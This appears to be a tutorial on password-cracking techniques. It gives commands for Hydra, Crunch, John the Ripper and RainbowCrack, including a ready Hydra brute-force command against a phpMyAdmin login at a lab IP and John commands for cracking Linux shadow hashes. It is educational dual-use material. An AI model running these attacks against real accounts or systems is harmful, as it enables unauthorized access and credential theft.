In cryptanalysis and computer security, the term password cracking is the process of recovering passwords from data that have been stored in or transmitted by a computer system. A common approach (brute-force attack) is to repeatedly try guesses for the password and to check them against an available cryptographic hash of the password.

In this new era where digital is present in every moment of our daily life, we use a password to protect virtually everything that needs to be protected. We use a password to turn on our computer, to access our email accounts, to login to our bank accounts, to pay our bills and much more.


THE VULNERABILITY LIES IN THE COMPLEXITY OF PASSWORD

In general, most people will tend to set passwords that are easy to remember, such as a birthday, a first-name or a last-name, a license plate or a phone number. The problem lies in the fact that most people are not aware of the ease with which a hacker can crack a password.

A strong password must at least match the following requirements:

  • Contains at least 8 characters
  • A mix of letters, numbers, and special characters
  • A combination of small and capital letters

There are two main categories of password cracking techniques:

  • Online attacks are performed on a live machine or system by using either brute-force or word-list attack against a login form, session, or other types of authentication method used.
  • Offline attacks are done for example by extracting a stolen website database to retrieve the stored password hashes and attempting to crack them using different techniques.

DICTIONARY ATTACK

For such an attack, the hacker uses a predefined list of words mostly stored in a text file and called dictionary, to try and guess the password. Most of the password is weak and most the hacker will be enabled to decode it quickly.

When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, ftp, http, https, smb, several databases, and much more. Before to move further, if Hydra is not yet installed on your machine, you can do it right away using one of the below installation methods. For more information about Hydra, you can visit the THC Hydra project page.

Ubuntu/Debian and other derived distributions

sudo apt -y update
sudo apt -y install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird-dev
sudo apt -y install hydra hydra-gtk

You can alternatively build Hydra directly from the source code

cd /tmp/
git clone https://github.com/vanhauser-thc/thc-hydra
cd thc-hydra/
./configure
make
make install

Usage

For attacking one target or a network, you can use the new "://" style: hydra [some command-line options] PROTOCOL://TARGET:PORT/MODULE-OPTIONS The old mode can be used for these too, and additionally if you want to specify your targets from a text file, you must use this one:

hydra [some command-line options] [-s PORT] TARGET PROTOCOL [MODULE-OPTIONS]

Via the command line options, you specify which logins to try, which passwords, if SSL should be used, how many parallel tasks to use for attacking, etc.

For this article, we will use Hydra to gain access to PHPMyAdmin onto a remote server. If you need some good dictionaries list, I recommend those made available by SkullSecurity and by Daniel Miessler that you can download freely.

To try to gain access to PHPMyAdmin we will run the following command.

hydra -t 1 -L users.list -P passwords.list -f -vV 3.11.107.102 http-post-form "/phpmyadmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1:denied"

Before to see the output of the above command, let have a look at every parameter.

  • -t it's used to configure the number of parallel connection
  • -L define the path of the file containing the logins
  • -P define the path of the file containing the passwords
  • -f to force the program to exit if a login/pass pair is found
  • -vV to execute the command in verbose∕debug mode
  • 3.11.107.102 the IP address of our pentest lab
  • http-post-form the path of the form that our tool will try to gain access

Output

Top Password Cracking Techniques used by Hackers

As you can see on the above screenshot, after a few attempts, Hydra did found the correct combination of username and password allowing us to gain access to PHPMyAdmin.


HYBRID DICTIONARY ATTACK

Hybrid Dictionary attack uses a set of dictionary words combined with extensions. For example, we have the word "admin" and combine it with number extensions such as "admin123", "admin147", etc...

"Crunch" is a wordlist generator where you can specify a standard character set or a character set. Crunch can generate all possible combinations and permutations. This tool comes bundled with Kali Linux. If you do not have Crunch yet installed in your machine, you can do it, following the below instructions.

Crunch Features

  • Crunch generates wordlists in both combination and permutation ways
  • It can breakup output by the number of lines or file size
  • Pattern supports number and symbols
  • Pattern supports upper and lower case characters separately
  • Adds a status report when generating multiple files
  • New -l option for literal support of @,%^
  • New -d option to limit duplicate characters see man file for details

Install Crunch on Ubuntu/Debian and other derived distributions

sudo apt -f install crunch

Install Crunch on Red Hat based distributions

sudo yum install crunch

Install Crunch on OpenSUSE based distributions

sudo zypper install crunch

The Crunch docs are bundled in a crunch-doc package that should be installed separately.

sudo apt-get install crunch-doc

If you want to find out more about Crunch, I suggest you visit the Sourceforge page of the project.

HOW TO USE CRUNCH

Create a word list without using any predefined string

Execute the command shown below, will generate a dictionary that contains a minimum of 2 characters and a maximum of 3, using default characters. It will start from aa and end with zzz.

crunch 2 3 -o test.txt

Here we have used the following parameters to generate our dictionary:

  • Min_len: 2, for two character letters
  • Max_len: 3, for three-character letters
  • -o: This option indicates the path where to save the output of the text file

Create a word list without using a predefined string

Now run the command shown below to generate a dictionary that contains a minimum of 4 characters and a maximum of 5, using noob as a predefined string. As per the previous example, the dictionary will start from nnnn and end with *bbbbb**.

crunch 4 5 noob -o test.txt

Create alphanumeric word list with crunch

If we need to create an alphanumeric dictionary we can do it using the following command.

crunch 2 5 noob123 -o test.txt

Execute the above command that will generate a dictionary that contains a minimum of 2 character letters and a maximum of 5 using noob123 as the predefined string.

Once you are done with your dictionary, you can go back to the previous paragraph and use a tool such as Hydra to gain access to your target.


BRUTE-FORCE ATTACK

Brute-Force attacks work by calculating every possible combination that could make up a password and testing it to see if it is the correct password. As the password's length increases, the amount of time, on average, to find the correct password increases exponentially.

This type of attack has a high probability of success, but it requires an enormous amount of time to process all the combinations. John the Ripper is one of the powerful tools to set a brute-force attack and it comes bundled with Kali Linux and ParrotSec. If you do not have it yet installed in your machine, you can do it, following the below instructions.

Install John the Ripper on Ubuntu/Debian and other derived distributions

sudo apt -f install john

Install John the Ripper on Red Hat based distributions

sudo yum install john

Install John the Ripper on OpenSUSE based distributions

sudo zypper install john

HOW TO USE JOHN THE RIPPER

Before starting with password cracking we can launch a simple performance hardware test. In this way, we can know the speed with which the tool will test keys with different types of encryption using 100% of our CPU.

john --test

Output

Top Password Cracking Techniques used by Hackers

As we can see, a series of tests are carried out for the performance to be measured.

CRACK LINUX USER PASSWORDS WITHOUT DICTIONARY

We will now move on to a real case. We can choose to directly load the file "/etc/shadow" that contains the Linux passwords and crack them, however, in this example we will create a file manually with a user and a password and we will tell John to crack it. We will do this for three reasons:

  • To not compromise our system
  • To get the results as quickly as possible
  • To have a first contact with the tool and familiarize ourselves with it

For this, we create a new text file named "password.txt", in our "/tmp/" folder with the following content:

user:AZl.zWwxIh15Q

Once we are done, we will run the following command:

cd /tmp/
john password.txt

Output

Top Password Cracking Techniques used by Hackers

Our password has been cracked. To see it, we must use the "--show" parameter as per the following command:

john --show password.txt

Top Password Cracking Techniques used by Hackers

Our password was "example" as in the Wikipedia sample. We can now try to log in to the system with the user "user" and the password "example", or it's what we would be able to do if we had worked directly with the file "/etc/shadow", although the cracking time would have taken much more than several minutes

CRACK LINUX USER PASSWORDS WITH DICTIONARY

We will repeat the same steps as before except that this time we will insert in our command the path to a dictionary that contains all the passwords to try.

john --wordlist=dictionary.lst shadow
john --show shadow

Output

Top Password Cracking Techniques used by Hackers

Having a simple password and few dictionary entries the process will be virtually instantaneous. We have already cracked or decrypted, the password.


RAINBOW TABLES

A rainbow table contains a set of predefined passwords that are hashed. It is a lookup table used especially in recovering plain passwords from a ciphertext. During the process of password recovery, it just looks at the pre-calculated hash table to crack the password. The tables can be downloaded from Rainbowcrack project page.

Features of RainbowCrack

  • Full time-memory tradeoff tool suites
  • Support rainbow table of any hash algorithm
  • Support rainbow table of any charset
  • Support rainbow table in raw file format (.rt) and compact file format (.rtc)
  • Computation on multi-core processor support
  • GPU acceleration with NVIDIA GPUs (CUDA technology)
  • GPU acceleration with AMD GPUs (OpenCL technology)
  • GPU acceleration with multiple GPUs
  • Runs on Windows operating systems
  • Runs on Linux operating systems
  • Unified rainbow table file format on all supported operating systems
  • Command-line user interface
  • Graphics user interface

RainbowCrack comes bundled with Kali Linux. If you do not have it yet in your machine, you can download a copy following the below instructions.

cd /tmp/
wget http://project-rainbowcrack.com/rainbowcrack-1.7-linux64.zip
unzip rainbowcrack-1.7-linux64.zip
cd rainbowcrack-1.7-linux64/
chmod +x rcrack
chmod +x rt*

TOOLS INCLUDED IN THE RAINBOWCRACK PACKAGE

rcrack - Rainbow table password cracker

./rcrack  
RainbowCrack 1.7  
Copyright 2017 RainbowCrack Project. All rights reserved.  
http://project-rainbowcrack.com/  

usage: ./rcrack path [path] [...] -h hash  
./rcrack path [path] [...] -l hash_list_file  
./rcrack path [path] [...] -lm pwdump_file  
./rcrack path [path] [...] -ntlm pwdump_file  
path: directory where rainbow tables (*.rt, *.rtc) are stored  
-h hash: load single hash  
-l hash_list_file: load hashes from a file, each hash in a line  
-lm pwdump_file: load lm hashes from pwdump file  
-ntlm pwdump_file: load ntlm hashes from pwdump file  

implemented hash algorithms:  
lm HashLen=8 PlaintextLen=0-7  
ntlm HashLen=16 PlaintextLen=0-15  
md5 HashLen=16 PlaintextLen=0-15  
sha1 HashLen=20 PlaintextLen=0-20  
sha256 HashLen=32 PlaintextLen=0-20  

examples:  
./rcrack . -h 5d41402abc4b2a76b9719d911017c592  
./rcrack . -l hash.txt

rt2rtc - Convert rainbow tables from .rt to .rtc

./rt2rtc  
RainbowCrack 1.7  
Copyright 2017 RainbowCrack Project. All rights reserved.  
http://project-rainbowcrack.com/  

usage: rt2rtc path [-s start_point_bits] [-e end_point_bits] [-c chunk_size_in_mb] [-p]  

1 <= start_point_bits <= 64  
1 <= end_point_bits <= 64  
1 <= chunk_size_in_mb

rtc2rt - Convert rainbow tables from .rtc to .rt

./rtc2rt  
RainbowCrack 1.7  
Copyright 2017 RainbowCrack Project. All rights reserved.  
http://project-rainbowcrack.com/  

usage: ./rtc2rt path

rtgen - Generate rainbow tables

./rtgen  
RainbowCrack 1.7  
Copyright 2017 RainbowCrack Project. All rights reserved.  
http://project-rainbowcrack.com/  

usage: rtgen hash_algorithm charset plaintext_len_min plaintext_len_max table_index chain_len chain_num part_index  
rtgen hash_algorithm charset plaintext_len_min plaintext_len_max table_index -bench  

hash algorithms implemented:  
lm HashLen=8 PlaintextLen=0-7  
ntlm HashLen=16 PlaintextLen=0-15  
md5 HashLen=16 PlaintextLen=0-15  
sha1 HashLen=20 PlaintextLen=0-20  
sha256 HashLen=32 PlaintextLen=0-20  

examples:  
rtgen md5 loweralpha 1 7 0 1000 1000 0  
rtgen md5 loweralpha 1 7 0 -bench

rtsort - Sort rainbow tables

./rtsort  
RainbowCrack 1.7  
Copyright 2017 RainbowCrack Project. All rights reserved.  
http://project-rainbowcrack.com/  

usage: ./rtsort path

QUICK TIPS
  • Don’t note down the passwords anywhere, just memorize them.
  • Set strong passwords that are difficult to crack.
  • Use a combination of alphabets, digits, symbols, and capital and small letters.
  • Don’t set passwords that are similar to their usernames.